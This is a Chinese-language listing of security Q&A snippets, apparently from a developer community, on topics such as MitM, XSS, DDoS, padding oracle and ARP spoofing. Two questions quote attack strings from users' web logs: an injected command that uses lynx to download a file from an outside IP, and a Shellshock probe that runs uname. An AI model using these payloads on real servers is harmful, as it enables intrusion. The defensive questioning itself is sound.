攻击者是否需要服务器的私钥才能模拟网站,或者拥有私钥只会使他有解密通信的能力?当我想到模拟一个网站时,我想到了一个碰撞攻击,其中一个md5散列被破坏了,然后可以使用一个假证书来使用一个新的密钥对来有效地模拟一个网站。当我想到一次MiTM攻击时,我想到的是一种攻击,在这种攻击中,处于中间的人获取服务器的私钥,并在客户端和服务器之间来回转发通信量,从而允许攻击者解密和查看所有通信。对我
浏览 0提问于2014-10-02得票数 0
回答已采纳
1回答
为什么Android许可证验证库不验证应用程序签名?
海事组织,LVL很容易将APK的证书与“真”证书进行比较。
浏览 7提问于2018-05-03得票数 1
1回答
我已经下载并查看了Microsoft库,但我不是100%确定是否需要将其用于服务器控件(asp: AntiXSS等)。当我使用标准的html控件(输入等)时,一切都很好。当我在服务器控件上使用antixss lib时,输出看起来被编码了两次。
我目前只对标准的html控件使用antixss库。是否通过使用服务器控件来保护我免受跨站点脚本攻击?这是最佳实践吗?
浏览 2提问于2009-05-29得票数 2
回答已采纳
2回答
我在验证一种叫做大华漏洞的攻击。在我的PCAP中:Host: xxx.xxx.xxx.xxx
如何复制此攻击以显示攻击者是否在此尝试中获得任何信息?(我不想查看服务器日志。我想复制这次攻击。)
浏览 0提问于2019-01-30得票数 1
回答已采纳
3回答
每次触发安全事件,我都会怀疑这次攻击是否真的成功。对于被设置为内联的事件,我们可以确信攻击是最不可能失败的。但是,对于设置为仅警报的事件,如何确定攻击是否成功?在这种情况下,我会查看有效载荷和PCAP,以获取尽可能多的信息。然而,大多数时候,我仍然无法确定攻击是否成功。
对于这种情况,我们如何确定攻击是否成功?
浏览 0提问于2011-08-14得票数 8
回答已采纳
在过去的几周中,我一直在研究可能的攻击,这些攻击可以使用SSH从与服务器不同的位置对Tor隐藏服务执行,假设.onion地址已经被删除。
我只对与SSH相关的攻击感兴趣。我在SSH协议上发现的唯一攻击是密码破解、字典攻击和中间人攻击(通过Joe的SSH工具,但它需要在同一个LAN中)。我已经尝试查看OpenSSH CVE列表,因为我可以灵活地在服务器上安装版本,但是我没有找到允许攻击者访问服务器(如
浏览 0提问于2021-12-16得票数 1
1回答
我的web服务器日志中有一些令人担忧的条目,我想知道这是否意味着我的服务器易受攻击。/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'"
我的服务器响应时阻塞了日志显示,所管理的所有内容都是下载一个图像文件(显然服务器上不存在)。但这似乎只是一次调查
浏览 0提问于2016-01-15得票数 3
回答已采纳
2回答
是否有任何标准的方法来防止共享的web服务器被滥用?我运行一个CPanel盒,上面有几个人,偶尔会有人决定使用它来访问其他网站。我目前的“检测”包括查看Munin图中的流量尖峰,然后在机器上打探,直到我找到原因为止。
有什么软件可以在攻击发生时发现攻击吗?
浏览 0提问于2010-12-14得票数 8
回答已采纳
这个问题不同于未定义,后者询问关于纯密文攻击的内容。这个问题是关于选择-明文攻击的。此攻击者不知道所使用的加密方法、密码是否已加盐或正在使用什么密钥。但是,他们注意到加密的密码总是相同数量的字符(64个)。使用他们选择的明文和加密密码,攻击者能否确定所使用的加密类型?
浏览 0提问于2018-01-09得票数 2
3回答
在这里,XSS攻击被视为来自客户端机器的攻击。但是有没有办法在服务器上进行XSS攻击呢?我想知道是否有任何方法可以像SQL注入那样使用客户端接口在服务器上执行代码,但这里不是数据库服务器,而是一个简单的Web服务器或应用程序服务器。
浏览 0提问于2013-05-09得票数 1
我的网站已经遭受广泛的ddos攻击大约一个月了。我没有注意到它,因为它并不重要,但是服务器上的其他一些网站开始遭受相同的攻击,所以我将它们转移到另一台服务器上,托管wordpress托管(它们提供ddos保护)。我无法确定这些攻击是否真的被阻止了,或者仅仅是攻击者在休息。
我尝试了DOS攻击软件,它似乎被阻止了,但我之前遭受的攻击性质不同(每一个请求都有新的IP,但使用代理相同)。我的问题是:我怎样
浏览 0提问于2014-08-18得票数 5
我目前正在执行ASP.NET应用程序的渗透测试,并试图利用Padding攻击进行攻击。此AFAIK基于响应码分析,但被测系统的ScriptResource和WebResource axds总是以200OK响应,即使密码已经无效。但是,在这种情况下,响应的内容是一个空字符串。
浏览 0提问于2011-04-22得票数 1
回答已采纳
2回答
我是这个领域的新手,我的知识是有限的,所以我不确定我对这个场景的回答是否合适。如果有人能帮上忙的话。所以情况是:基本的发现是,有5个web应用程序被破坏,其中1站点存在SQL注入问题。应用程序安全性被定义为“向软件添加功能或功能以防止一系列不同威胁的一般做法,其中包括拒绝服务攻击和其他网络攻击,以及数据破坏或数据窃取情况”。关于这一设想:
web应用程序存储在数据库<em
浏览 0提问于2017-08-26得票数 2
1回答
我在webser日志中注意到了一些可疑的活动:
188.165.66.110 - - [20/Feb/2015:03:58:28 +0000] "GET /?x=()?x=()?x=()?x=() {:; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;/bin/uname -a;echo @ HTTP/1.0" 301 178 "() {:; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;/bin/una
浏览 0提问于2015-02-20得票数 1
回答已采纳
3回答
服务器被攻击?
、、、
7.25号购买了一个月,8.24号续费的,今天有攻击,想换国内硬防服务器,申请退剩余时间,结果说续费不能退,要从7.25算 5天内才可以退,人家阿里云就可以退剩余时间,真是服了,我国内服务器也打算用腾讯云的
浏览 748提问于2018-08-28
1回答
需要你的专家建议支持sslv3或TLS1.0并使用CBC密码的任何服务器。如果服务器支持sslv3,并且在nmap给出的密码列表中的任何位置都有CBC密码,那么我们可以说
浏览 0提问于2016-02-18得票数 2
回答已采纳
1回答
DNS反射器攻击-保护
、、、
memstatistics-file "data/named_mem_stats.txt"; */ recursion no;这是否意味着我受到了保护,免受基于DNS的攻击?像反光镜这样的攻击?
浏览 0提问于2013-04-03得票数 0
我很好奇连接到VPN的用户是否有可能对OpenVPN或Wireguard服务器的同一子网上的其他用户执行ARP欺骗/中毒攻击。OpenVPN和Wireguard在默认情况下是否提供内置的抗ARP攻击的缓解功能&如果是的话,这种保护可以被恶意服务器或受损服务器禁用吗?
浏览 0提问于2019-02-28得票数 0
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
腾讯会议
实时音视频活动推荐
腾讯云开发者
